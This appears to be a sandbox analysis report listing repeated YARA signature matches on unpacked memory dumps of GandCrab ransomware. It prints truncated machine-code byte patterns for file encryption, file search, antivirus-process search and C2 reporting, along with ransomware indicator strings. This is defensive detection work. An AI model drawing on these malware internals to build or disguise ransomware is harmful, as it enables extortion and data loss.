0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
0.0.wThN5MTIsw.exe.f4e0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0.0.wThN5MTIsw.exe.f4e0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0.0.wThN5MTIsw.exe.f4e0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0.0.wThN5MTIsw.exe.f4e0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0.0.wThN5MTIsw.exe.f4e0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0.0.wThN5MTIsw.exe.f4e0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 4E 0F 8B 35 44 A1 4E 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 4E 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 4E 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 4E 0F 8B 35 10 A1 4E 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 4E 0F C7 44 24 1C 64 F4 4E 0F C7 44 24 20 80 F4 4E 0F C7 44 24 24 A0 F4 4E 0F C7 44 24 28 BC F4 4E 0F C7 44 24 2C D8 F4 4E 0F C7 44 24 30 F0 F4 4E 0F C7 44 24 34 04 F5 4E 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 4E 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 4F 0F C7 45 B8 BC 03 4F 0F C7 45 BC ...
19.2.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
19.2.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
19.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
19.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
19.2.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
19.2.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
19.2.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
19.3.ssapst.exe.3520000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
19.3.ssapst.exe.3520000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
19.3.ssapst.exe.3520000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
19.3.ssapst.exe.3520000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
19.3.ssapst.exe.3520000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
19.3.ssapst.exe.3520000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
30.3.ssapst.exe.2fc0000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
30.3.ssapst.exe.2fc0000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
30.3.ssapst.exe.2fc0000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
30.3.ssapst.exe.2fc0000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
30.3.ssapst.exe.2fc0000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
30.3.ssapst.exe.2fc0000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
8.2.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
8.2.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
8.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
8.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
8.2.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
8.2.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
8.2.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
25.3.ssapst.exe.36d0000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
25.3.ssapst.exe.36d0000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
25.3.ssapst.exe.36d0000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
25.3.ssapst.exe.36d0000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
25.3.ssapst.exe.36d0000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
25.3.ssapst.exe.36d0000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
12.2.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
12.2.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
12.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
12.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
12.2.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
12.2.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
12.2.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
6.3.ssapst.exe.2f70000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
6.3.ssapst.exe.2f70000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
6.3.ssapst.exe.2f70000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
6.3.ssapst.exe.2f70000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
6.3.ssapst.exe.2f70000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
6.3.ssapst.exe.2f70000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
15.2.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
15.2.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
15.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
15.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
15.2.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
15.2.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
15.2.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
25.3.ssapst.exe.36d0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
25.3.ssapst.exe.36d0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
25.3.ssapst.exe.36d0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
25.3.ssapst.exe.36d0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
25.3.ssapst.exe.36d0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
25.3.ssapst.exe.36d0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
32.2.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
32.2.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
32.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
32.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
32.2.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
32.2.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
